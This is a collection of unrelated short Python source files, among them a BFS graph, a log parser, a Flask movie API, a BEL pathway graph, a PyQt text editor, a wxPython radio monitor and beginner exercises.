print("SSIM_predicted=", avg_ssim_predicted / len(image_list))
print("SSIM_bicubic=", avg_ssim_bicubic / len(image_list))
print("It takes average {}s for processing".format(avg_elapsed_time / len(image_list)))
|
#!/usr/bin/python3
import queue
from collections import defaultdict
class Graph():
def __init__(self, n):
self.n = n
self.edges = defaultdict(lambda: [])
def connect(self, x, y):
self.edges[x].append(y)
self.edges[y].append(x)
def find_all_distances(self, s):
result = [-1 for i in range(self.n)]
visited = [False for i in range(self.n)]
q = [s]
visited[s] = True
result[s] = 0
while len(q) > 0:
current = q.pop()
height = result[current]
for neighbor in self.edges[current]:
if not visited[neighbor]:
result[neighbor] = height + 6
q = [neighbor] + q
visited[neighbor] = True
result.pop(s)
print(" ".join(map(str, result)))
|
from sys import argv
fname = argv[1]
with open(fname) as f:
lines = f.readlines()
layer = -1
comp_time = 0
cum_comp_time = 0
in_size = 0
out_size = 0
trans_time = 0
thresh = 0
cum_thresh = 0
is_check = False
for line in lines:
if line.startswith("Layer Number"):
num = int(line.split(":")[1].strip())
if num == layer:
continue
else:
if layer != -1:
# Print previous layer
print("{}, {}, {}, {}, {}, {}, {}, {}, {}".format(layer, in_size, out_size, comp_time, cum_comp_time, trans_time, thresh, cum_thresh, is_check))
layer = num
is_check = False
elif line.startswith("Time Taken compute cumulative"):
num = float(line.split("=")[1].strip())
cum_comp_time = num
elif line.startswith("Time Taken compute"):
num = float(line.split("=")[1].strip())
comp_time = num
elif line.startswith("Input Size"):
num = int(line.split(":")[1].strip())
in_size = num
elif line.startswith("Ouput Size"):
num = int(line.split(":")[1].strip())
out_size = num
elif line.startswith("Time Taken transfer"):
num = float(line.split("=")[1].strip())
trans_time = num
elif line.startswith("Thresh"):
num = float(line.split("=")[1].strip())
thresh = num
elif line.startswith("Cumulative Thresh"):
num = float(line.split("=")[1].strip())
cum_thresh = num
elif line.startswith("CHECKPOINT"):
is_check = True
# Print previous layer
print("{}, {}, {}, {}, {}, {}, {}, {}, {}".format(layer, in_size, out_size, comp_time, cum_comp_time, trans_time, thresh, cum_thresh, is_check))
|
from flask import Flask
from redis import Redis
from flask import jsonify
from flask import request
import requests
import json
import re
import copy
app = Flask(__name__)
movies = [ {
'ID' : '0',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : '5.3',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '1',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '2',
'Title' : 'Movie_1',
'Release_date' : '05-2018',
'Rating' : '8.0',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '3',
'Title' : 'Movie_2',
'Release_date' : '05-2018',
'Rating' : '3.75',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '4',
'Title' : 'Movie_3',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '5',
'Title' : 'Avengers: Infinity War',
'Release_date' : '05-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '6',
'Title' : 'Alpha',
'Release_date' : '09-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '7',
'Title' : 'Fantastic Beasts: Crimes of Grundelvald',
'Release_date' : '11-2018',
'Rating' : 'Not Rated',
'Genre' : 'Fantasy',
'Album_ID' : '1'
},
{
'ID' : '8',
'Title' : 'Insidious: the last key',
'Release_date' : '01-2018',
'Rating' : 'Not Rated',
'Genre' : 'Horror',
'Album_ID' : '1'
}]
@app.route('/movies', methods=['GET'])
def hello():
if( request.args.get('embedded', '') == "album"):
moviesEmb=copy.deepcopy(movies)
for i in range(0, len(movies)):
try:
r = requests.get('http://web1:81/albums/'+moviesEmb[int(i)]['Album_ID'])
r = json.loads(r.text)
moviesEmb[int(i)]['Album'] = r[0]
except:
moviesEmb[int(i)]['Album'] = "null"
return jsonify(moviesEmb), 200
elif( request.args.get('title', '')):
foundMovies = []
for i in movies:
if( re.search(request.args.get('title', ''), i["Title"], re.IGNORECASE)):
foundMovies.append(i)
return jsonify(foundMovies), 200
elif( request.args.get('genre', '')):
foundMovies = [ movie for movie in movies if (movie['Genre'] == request.args.get('genre', ''))]
return jsonify(foundMovies), 200
elif( request.args.get('rating', '')):
if( re.search('^[0-9](\.[0-9]*)?$', request.args.get('rating', ''))):
foundMovies = []
for movie in movies:
if ( re.search('^[0-9](\.[0-9]*)?$', movie['Rating'])):
if (float(movie['Rating']) > float(request.args.get('rating', ''))):
foundMovies.append(movie)
return jsonify(foundMovies), 200
else:
return jsonify({'Error':'Rating has to be between 0-10'}), 404
else:
return jsonify(movies), 200
@app.route('/movies/<movieID>', methods=['GET'])
def getMovieByID(movieID):
if( request.args.get('embedded', '') == "album"):
moviesEmb=copy.deepcopy(movies)
r = requests.get('http://web1:81/albums/'+moviesEmb[int(movieID)]['Album_ID'])
r = json.loads(r.text)
moviesEmb[int(movieID)]['Album'] = r[0]
return jsonify(moviesEmb[int(movieID)]), 200
else:
movieByID = [ movie for movie in movies if ( movie['ID'] == movieID)]
return jsonify(movieByID), 200
@app.route('/movies', methods=['POST'])
def newMovie():
if('Album' in request.json):
album = request.json['Album']
r = requests.post('http://web1:81/albums', json = {"Album" : album['Album'], "Artist" : album['Artist'], "Genre" : album['Genre'], "Producer" : album['Producer']})
r = json.loads(r.text)
numberOfMovies = len(movies)
new_Movie={
'ID' : str(numberOfMovies),
'Title' : request.json['Title'],
'Release_date' : request.json['Release_date'],
'Rating' : request.json['Rating'],
'Genre' : request.json['Genre'],
'Album_ID' : r['ID']
}
movies.append(new_Movie)
return jsonify(new_Movie), 201
else:
numberOfMovies = len(movies)
r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
if r.status_code == 404:
return jsonify({'Error' : 'Album not found.'}), 404
else:
new_Movie={
'ID' : str(numberOfMovies),
'Title' : request.json['Title'],
'Release_date' : request.json['Release_date'],
'Rating' : request.json['Rating'],
'Genre' : request.json['Genre'],
'Album_ID' : request.json['Album_ID']
}
movies.append(new_Movie)
return jsonify(new_Movie), 201
@app.route('/movies/<movieId>', methods=['PATCH'])
def rateMovie( movieId ):
if( 'Album' in request.json ):
r = requests.put('http://web1:81/albums/'+movies[int(movieId)]["Album_ID"], json = {"Album" : request.json['Album']['Album'], "Artist" : request.json['Album']['Artist'], "Genre" : request.json['Album']['Genre of Album'], "Producer" : request.json['Album']['Producer']})
r = json.loads(r.text)[0]
return jsonify(r), 200
elif('Album_ID' in request.json):
r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
if r.status_code == 404:
return jsonify({'Error' : 'Album not found.'}), 404
else:
movies[int(movieId)]["Album_ID"] = request.json['Album_ID']
return jsonify(movies[int(movieId)]), 200
else:
rated = [ movie for movie in movies if ( movie['ID'] == movieId)]
setRating = request.json['Rating']
if(setRating == 10) or (re.search('^[0-9](\.[0-9]*)?$', setRating)):
if (movies[int(movieId)]["Rating"] == "Not Rated"):
movies[int(movieId)]["Rating"] = setRating
else:
rating = movies[int(movieId)]["Rating"]
movies[int(movieId)]["Rating"] = (float(0 if rating == "Not Rated" else rating) + (0 if setRating == "Not Rated" else float(setRating))) / 2
return jsonify(movies[int(movieId)]), 200
else:
return jsonify({'Error':'Rating has to be between 0-10'}), 404
#curl -i -X PUT -H "Content-Type: application/json" -d '{"Title": "Venom", "Release_date": "2018", "Rating": "Not Rated", "Genre": "Horror", "Album_ID": "2"}' localhost/movies/2
#curl -i -X PUT -H "Content-Type: application/json" -d '{"Title": "Venom", "Release_date": "2018", "Rating": "Not Rated", "Genre": "Horror", "Album": {"Album" : "1", "Artist" : "Mikutavicius", "Genre of Album" : "yra", "Producer" : "Mikutavicius"}}' localhost/movies/2
@app.route('/movies/<movieId>', methods=['PUT'])
def changeMovie( movieId ):
if('Album' in request.json):
movies[int(movieId)]['Title'] = request.json['Title']
movies[int(movieId)]['Genre'] = request.json['Genre']
movies[int(movieId)]['Rating'] = request.json['Rating']
movies[int(movieId)]['Release_date'] = request.json['Release_date']
r = requests.put('http://web1:81/albums/'+movies[int(movieId)]["Album_ID"], json = {"Album" : request.json['Album']['Album'], "Artist" : request.json['Album']['Artist'], "Genre" : request.json['Album']['Genre of Album'], "Producer" : request.json['Album']['Producer']})
movies[int(movieId)]['Album'] = json.loads(r.text)[0]
return jsonify(movies[int(movieId)]), 200
else:
r = requests.get('http://web1:81/albums/'+request.json['Album_ID'])
if r.status_code == 404:
return jsonify({'Error' : 'Album not found.'}), 404
else:
movies[int(movieId)]['Title'] = request.json['Title']
movies[int(movieId)]['Genre'] = request.json['Genre']
movies[int(movieId)]['Rating'] = request.json['Rating']
movies[int(movieId)]['Release_date'] = request.json['Release_date']
movies[int(movieId)]['Album_ID'] = request.json['Album_ID']
return jsonify(movies[int(movieId)]), 200
#Deletes movie by ID curl -i -X DELETE localhost/movies/3
@app.route('/movies/<movieId>', methods=['DELETE'])
def removeMovie( movieId ):
deleted = [ movie for movie in movies if ( movie['ID'] == movieId)]
if len(deleted) == 0:
return jsonify({'Delete failed' : 'ID not found.'}), 404
else:
movies.remove(deleted[0])
return jsonify(deleted[0]), 200
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True, port=5000)
|
def Multi( arg1=0, arg2=0 , *vartuple ):
"""Multiplica todos los argumentos"""
produc=arg1*arg2
for var in vartuple:
produc=produc*var
return produc
def Fib(n):
"""Recibe un entero n, y entrega una lista con los números de fibonacci menores que n"""
result = []
a, b = 0, 1
while b < n:
result.append(b)
a, b = b, a+b
return result
def SumLis(list):
"""Suma los elementos de la lista que se pasa como argumento"""
sum=0
for i in list:
sum=sum + i
return sum
if __name__ == "__main__":
print("Módulo new_func como script") |
# -*- coding: utf-8 -*-
"""An example describing EGF's effect on cellular processes.
.. code-block:: none
SET Citation = {"PubMed","Clin Cancer Res 2003 Jul 9(7) 2416-25","12855613"}
SET Evidence = "This induction was not seen either when LNCaP cells were treated with flutamide or conditioned medium were pretreated with antibody to the epidermal growth factor (EGF)"
SET Species = 9606
tscript(p(HGNC:AR)) increases p(HGNC:EGF)
UNSET ALL
SET Citation = {"PubMed","Int J Cancer 1998 Jul 3 77(1) 138-45","9639405"}
SET Evidence = "DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN gamma reduction more significant."
SET Species = 9606
p(HGNC:IFNA1) decreases p(HGNC:EGF)
p(HGNC:IFNG) decreases p(HGNC:EGF)
UNSET ALL
SET Citation = {"PubMed","DNA Cell Biol 2000 May 19(5) 253-63","10855792"}
SET Evidence = "Although found predominantly in the cytoplasm and, less abundantly, in the nucleus, VCP can be translocated from the nucleus after stimulation with epidermal growth factor."
SET Species = 9606
p(HGNC:EGF) increases tloc(p(HGNC:VCP), GO:nucleus, GO:cytoplasm)
UNSET ALL
SET Citation = {"PubMed","J Clin Oncol 2003 Feb 1 21(3) 447-52","12560433"}
SET Evidence = "Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic function and metastasis via activation of the nuclear factor-kappaB signaling pathway."
SET Species = 9606
cat(p(HGNC:VCP)) increases tscript(complex(p(HGNC:NFKB1), p(HGNC:NFKB2), p(HGNC:REL), p(HGNC:RELA), p(HGNC:RELB)))
tscript(complex(p(HGNC:NFKB1), p(HGNC:NFKB2), p(HGNC:REL), p(HGNC:RELA), p(HGNC:RELB))) decreases bp(MESHPP:Apoptosis)
UNSET ALL
"""
from ..dsl import BiologicalProcess, ComplexAbundance, Protein, activity, translocation
from ..language import cytoplasm, nucleus
from ..resources import CHEBI_URL, CONFIDENCE_URL, GO_URL, HGNC_URL, SPECIES_PATTERN
from ..struct.graph import BELGraph
__all__ = [
"egf_graph",
]
egf_graph = BELGraph(
name="EGF Pathway",
version="1.0.0",
description="The downstream effects of EGF",
authors="Charles Tapley Hoyt",
contact="cthoyt@gmail.com",
)
egf_graph.namespace_url.update(
{
"hgnc": HGNC_URL,
"chebi": CHEBI_URL,
"go": GO_URL,
}
)
egf_graph.annotation_url.update(
{
"Confidence": CONFIDENCE_URL,
}
)
egf_graph.annotation_pattern.update(
{
"Species": SPECIES_PATTERN,
}
)
ar = Protein(name="AR", namespace="hgnc")
egf = Protein(name="EGF", namespace="hgnc")
ifna1 = Protein(name="IFNA1", namespace="hgnc")
ifng = Protein(name="IFNG", namespace="hgnc")
vcp = Protein(name="VCP", namespace="hgnc")
nfkb1 = Protein(name="NFKB1", namespace="hgnc")
nfkb2 = Protein(name="NFKB2", namespace="hgnc")
rel = Protein(name="REL", namespace="hgnc")
rela = Protein(name="RELA", namespace="hgnc")
relb = Protein(name="RELB", namespace="hgnc")
nfkb_complex = ComplexAbundance([nfkb1, nfkb2, rel, rela, relb])
apoptosis = BiologicalProcess(namespace="go", name="apoptotic process", identifier="0006915")
egf_graph.add_increases(
ar,
egf,
citation="12855613",
evidence="This induction was not seen either when LNCaP cells were treated with flutamide or conditioned medium "
"were pretreated with antibody to the epidermal growth factor (EGF)",
annotations={"Species": "9606"},
source_modifier=activity("tscript"),
)
egf_graph.add_decreases(
ifna1,
egf,
citation="9639405",
evidence="DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN "
"gamma reduction more significant.",
annotations={"Species": "9606"},
)
egf_graph.add_decreases(
ifng,
egf,
citation="9639405",
evidence="DU-145 cells treated with 5000 U/ml of IFNgamma and IFN alpha, both reduced EGF production with IFN "
"gamma reduction more significant.",
annotations={"Species": "9606"},
)
egf_graph.add_increases(
egf,
vcp,
citation="10855792",
evidence="Although found predominantly in the cytoplasm and, less abundantly, in the nucleus, VCP can be "
"translocated from the nucleus after stimulation with epidermal growth factor.",
annotations={"Species": "9606"},
target_modifier=translocation(
from_loc=nucleus,
to_loc=cytoplasm,
),
)
egf_graph.add_increases(
vcp,
nfkb_complex,
citation="12560433",
evidence="Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic"
" function and metastasis via activation of the nuclear factor-kappaB signaling pathway.",
annotations={"Species": "9606"},
source_modifier=activity("cat"),
target_modifier=activity("tscript"),
)
egf_graph.add_decreases(
nfkb_complex,
apoptosis,
citation="12560433",
evidence="Valosin-containing protein (VCP; also known as p97) has been shown to be associated with antiapoptotic "
"function and metastasis via activation of the nuclear factor-kappaB signaling pathway.",
annotations={"Species": "9606"},
source_modifier=activity("tscript"),
)
|
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.Qsci import *
import json
import re
import platform
lexers = {
"py": QsciLexerPython,
"css": QsciLexerCSS,
"cs": QsciLexerCSharp,
"coffee": QsciLexerCoffeeScript,
"json": QsciLexerJSON,
"html": QsciLexerHTML,
"yml": QsciLexerYAML,
"md": QsciLexerMarkdown,
}
class CustomMainWindow(QMainWindow):
def __init__(self):
super(CustomMainWindow, self).__init__()
self.setWindowTitle("Chai")
# load the json config
with open("config.json", "r") as f:
self.jsonConfig = f.read()
self.loadTheme("minute")
self.Config = json.loads(self.jsonConfig)
with open("main.css", "r") as f:
self.__styles = f.read()
print(self.Config)
# make frame
self.__frm = QFrame(self)
self.__openFilePath = ""
self.__lyt = QVBoxLayout()
self.__frm.setStyleSheet(self.__styles)
self.__frm.setLayout(self.__lyt)
self.setCentralWidget(self.__frm)
self.__myFont = QFont(self.Config['fontFamily'])
print("set font to " + self.Config['fontFamily'])
self.__myFont.setPointSize(self.Config['fontSize'])
self.__bgcolor = QColor(self.Config["backgroundColor"])
self.__bglight = QColor(self.Config['backgroundLight'])
self.__fgcolor = QColor(self.Config['foregroundColor'])
self.__fglight = QColor(self.Config['foregroundLight'])
# QScintilla editor setup
# ------------------------
# ! Make instance of QsciScintilla class!
self.__editor = QsciScintilla()
self.__editor.setText("")
self.__editor.setLexer(None)
self.__editor.setUtf8(self.Config['utf8']) # Set encoding to UTF-8
self.__editor.setFont(self.__myFont) # Will be overridden by lexer!
# these parameters will be eventually editable via a json file
if self.Config['wrapMode'] == "word":
self.__editor.setWrapMode(QsciScintilla.WrapWord)
elif self.Config['wrapMode'] == "none":
self.__editor.setWrapMode(QsciScintilla.WrapNone)
elif self.Config['wrapMode'] == "character":
self.__editor.setWrapMode(QsciScintilla.WrapCharacter)
else:
self.__editor.setWrapMode(QsciScintilla.WrapWhitespace)
self.__editor.setWrapVisualFlags(QsciScintilla.WrapFlagNone, QsciScintilla.WrapFlagInMargin, QsciScintilla.WrapIndentSame)
self.__editor.setIndentationsUseTabs(True)
self.__editor.setTabWidth(self.Config["tabSize"])
self.__editor.setIndentationGuides(self.Config["indentationGuides"])
self.__editor.setIndentationGuidesForegroundColor(self.__fglight)
self.__editor.setIndentationGuidesBackgroundColor(self.__fglight)
self.__editor.setAutoIndent(True)
self.__editor.setPaper(self.__bgcolor)
self.__editor.setColor(self.__fgcolor)
self.__editor.setCaretForegroundColor(self.__fglight)
self.__editor.setCaretLineBackgroundColor(self.__bglight)
self.__editor.setCaretLineVisible(True)
self.__editor.setCaretWidth(3)
# Margin Stuff
self.__editor.setMarginType(1, QsciScintilla.NumberMargin)
# TODO: set dynamic calculation of margin width
contentLength = len(str(self.__editor.text()))
self.__editor.setMarginWidth(1, "00000")
self.__editor.setMarginsBackgroundColor(self.__bgcolor)
self.__editor.setMarginsForegroundColor(self.__fglight)
# EOL
self.__editor.setEolMode(QsciScintilla.EolUnix)
# Lexer Implementation:
# move the editor!
self.__editor.setStyleSheet("border: 0px; margin: 15px;")
# ! Add editor to layout !
self.__lyt.addWidget(self.__editor)
# initialize menubar
menubar = self.menuBar()
openAction = QAction('&Open', self)
openAction.setStatusTip('Open File')
openAction.triggered.connect(self.openDialog)
saveAction = QAction('&Save', self)
saveAction.setStatusTip('Save File')
saveAction.triggered.connect(self.saveFile)
toggleLineNumAction = QAction('&Toggle Line Nums', self)
toggleLineNumAction.setStatusTip('Toggle Line Numbers')
toggleLineNumAction.triggered.connect(self.toggleLines)
fileMenu = menubar.addMenu('&File')
viewMenu = menubar.addMenu('&View')
if platform.system() != "Darwin":
openAction.setShortcut('Ctrl+O')
saveAction.setShortcut('Ctrl+S')
menubar.setStyleSheet("background-color: " + self.Config['backgroundColor'] + "; color: " + self.Config['foregroundLight'])
else:
openAction.setShortcut('Cmd+O')
saveAction.setShortcut('Cmd+S')
fileMenu.addAction(openAction)
fileMenu.addAction(saveAction)
viewMenu.addAction(toggleLineNumAction)
self.show()
def toggleLines(self):
if self.__editor.marginWidth(1) > 0:
self.__editor.setMarginWidth(1, 0)
else:
self.__editor.setMarginWidth(1, "0000")
def openFile(self, path):
# get content of file
with open(path, "r") as f:
self.fileContent = f.read()
self.__editor.setText(self.fileContent)
self.setLexerFromFileExtension(path)
self.__openFilePath = path
def openDialog(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileName(self,"QFileDialog.getOpenFileName()", "","All Files (*);;Python Files (*.py)", options=options)
if fileName:
print("opening",fileName)
self.openFile(fileName)
def saveFile(self):
if self.__openFilePath != "":
dtext = self.__editor.text()
print(dtext)
with open(self.__openFilePath, "w+") as f:
f.write(dtext)
else:
self.saveDialog()
def saveDialog(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getSaveFileName(self,"QFileDialog.getSaveFileName()", "","All Files (*);;Python Files (*.py)", options=options)
if fileName:
print("\""+fileName+"\"")
self.__openFilePath = fileName
self.saveFile()
def setLexerFromFileExtension(self, path):
regex = r".+\.(\w+)"
result = re.search(regex, path)
print(result[1])
l = result[1]
lexer = lexers[l]()
languageTheme = self.__theme[l]
"""
for index, value in lexers.items():
print(index)
for n in list(range(30)):
print(lexers[index]().description(n))
print("\n\n")
"""
#self.__editor.Styles[lexer.commentLine.size] = 18
lexer.setDefaultFont(self.__myFont)
lexer.setDefaultPaper(self.__bgcolor)
lexer.setDefaultColor(self.__fgcolor)
print(languageTheme)
for name, value in languageTheme.items():
print(value, name)
lexer.setColor(QColor(value), getattr(lexers[l](), name))
lexer.setPaper(self.__bgcolor, getattr(lexers[l](), name))
lexer.setFont(self.__myFont, getattr(lexers[l](), name))
self.__editor.setLexer(lexer)
def loadTheme(self, themename):
with open("./themes/{}.json".format(themename), "r") as f:
self.__theme = json.loads(f.read())
''' END CLASS '''
if __name__ == '__main__':
print(platform.system())
app = QApplication(sys.argv)
QApplication.setStyle(QStyleFactory.create('Fusion'))
myGUI = CustomMainWindow()
sys.exit(app.exec_())
|
# 7. Receba os valores do comprimento, largura e altura de um paralelepípedo.
# Calcule e mostre seu volume.
def paralelepipedo():
try:
c = int(input("Digite o comprimento do paralelepípedo: "))
l = int(input("Digite a largura do paralelepípedo: "))
h = int(input("Digite a altura do paralelepípedo: "))
paral = c * l * h
print("Resultado: ", paral)
except ValueError:
print("Digite apenas números!")
paralelepipedo()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# monitorradio.py
import logging
import wx
import os, sys
from datetime import date
from time import ctime
from tombo.configfile import ConfigFile
from serialcommands import SerialCommands
#from tombo.timedstatusbar import TimedStatusBar
import elecraft
''' Responses from the MD; command:
Voice Modes: LSB = 1, USB = 2, AM = 5
CW Modes: CW = 3, CW-REV = 7
DATA Modes: DATA = 6, DATA-REV = 9
'''
modes = {
'MD1;':['VOICE_MODE', 'LSB'],
'MD2;':['VOICE_MODE', 'USB'],
'MD5;':['VOICE_MODE', 'AM'],
'MD3;':['CW_MODE', 'CW'],
'MD7;':['CW_MODE', 'CW-REV'],
'MD6;':['DATA_MODE', 'DATA'],
'MD9;':['DATA_MODE', 'DATA-REV']
}
class MainWindow(wx.Frame):
""" A frame that encloses a panel which encloses widgets. """
def __init__(self, parent, title):
""" Use the constructor to build the interface and show the window. """
super(MainWindow, self).__init__(parent, title=title, size=(650, 400))
self.gatherConfigInfo('serialcommandswx.conf')
self.sc = SerialCommands(self.ports)
self.InitUI()
self.Centre()
self.Show()
def gatherConfigInfo(self, configfile):
config = ConfigFile(configfile)
self.ports = config.getItems('Ports')
self.poll_interval = config.getNumber('Misc', 'poll_interval')
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.checkStatus, self.timer)
def InitUI(self):
""" Organizes building the interface. """
# Top level panel - holds all other windows
vbox1 = wx.BoxSizer(wx.VERTICAL)
self.panel = wx.Panel(self)
vbox1.Add(item=self.panel, proportion=1, flag=wx.ALL|wx.EXPAND)
self.SetSizer(vbox1)
vbox2 = wx.BoxSizer(wx.VERTICAL)
self.panel.SetSizer(vbox2)
vbox2.Add(item=self.buildLabelGrid(self.panel), flag=wx.CENTER|wx.TOP, border=40)
self.buildStatusBar()
self.timer.Start(self.poll_interval)
def buildLabelGrid(self, owner):
label_grid = wx.FlexGridSizer(rows=2, cols=2, hgap=3, vgap=10)
label_grid.AddMany(self.buildLabels(owner))
return label_grid
def buildLabels(self, owner):
return [
(wx.StaticText(owner, id=wx.ID_ANY, label='Test Mode'), 0),
(wx.StaticText(owner, id=wx.ID_ANY, label='On'), 0),
(wx.StaticText(owner, id=wx.ID_ANY, label='VOX'), 0),
(wx.StaticText(owner, id=wx.ID_ANY, label='On'), 0),
]
def buildStatusBar(self):
""" Build a lowly status bar. """
self.statusbar = wx.StatusBar(self)
self.statusbar.SetFieldsCount(3)
self.SetStatusBar(self.statusbar)
# Methods related to a button click
def onQuit(self, event):
self.sc.closePorts()
self.Close()
def onButtonClick(self, event):
eventid = event.GetId()
self.runCommand(self.widgetids[eventid])
def runCommand(self, command):
command_names = self.command_sequences[command].split('|')
for command_name in command_names:
command_list = self.commands[command_name].split('|')
self.sc.runCommand(command_list)
def checkStatus(self, event):
self.statusbar.SetStatusText(ctime(), 2)
numeric_mode = self.sc.readPort(['COM13', 'MD;'])
mode_main_specific = modes.get(numeric_mode)
self.statusbar.SetStatusText(mode_main_specific[0], 0)
self.statusbar.SetStatusText(mode_main_specific[1], 1)
response = self.sc.readPort(['COM13', 'IC;'])
status = elecraft.listifyHexstring(response)
print(status)
if __name__ == '__main__':
logger = logging.getLogger('SERIALCOMMANDSWX')
logger.setLevel(logging.INFO)
log_format = '%(asctime)s:%(lineno)s:%(levelname)s:%(name)s:%(message)s'
formatter = logging.Formatter(log_format)
file_handler = logging.FileHandler('serialcommandswx.log')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
app = wx.App()
MainWindow(None, title='Monitor Radio')
app.MainLoop()
|
tc = input('Informe (A) para Alcool ou (G) para Gasolina: ').upper()
ql = float(input('Informe a quantidade de litros: '))
if (tc == 'A'):
valor = 1.9
if (ql <= 20):
desc = 3
else:
desc = 5
else:
valor = 2.5
if (ql <= 20):
desc = 4
else:
desc = 6
total = (valor * ql) * ((100 - desc) / 100.0)
print ('Total a pagar é %.2f' % total)
|
import os
from datetime import datetime
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from src.models.users import User
class UserController:
"""
Provides functionality to retrieve and send user data from/to the database
"""
@staticmethod
def get_all_users():
"""
get all ratings in the database
:return:
"""
# create a db engine
conn_url = os.getenv("DATABASE_URL")
engine = create_engine(conn_url, echo=True)
session_maker = sessionmaker(bind=engine)
session = session_maker()
# get all ratings
users = session.query(User).all()
return pd.DataFrame(
[
[
user.id,
user.username,
user.password,
user.last_trained_on,
user.tbl_rating_user_id,
]
for user in users
],
columns=[
"id",
"username",
"password",
"last_trained_on",
"tbl_rating_user_id",
],
)
@staticmethod
def update_user_timestamp(users_without_ratings):
"""
updates the timestamp of the last user training
:return:
"""
today = datetime.today()
# create a db engine
conn_url = os.getenv("DATABASE_URL")
engine = create_engine(conn_url, echo=True)
session_maker = sessionmaker(bind=engine)
session = session_maker()
# get all ratings
users = session.query(User).all()
for user in users:
# If a user has not rated before, we will not update the timestamp for this specific user
# we cannot just check here in case the user has rated in the before training started and now
if user.username in users_without_ratings:
continue
# update the last trained on flag to reflect the current time
user.last_trained_on = today
# update the user
session.add(user)
session.commit()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.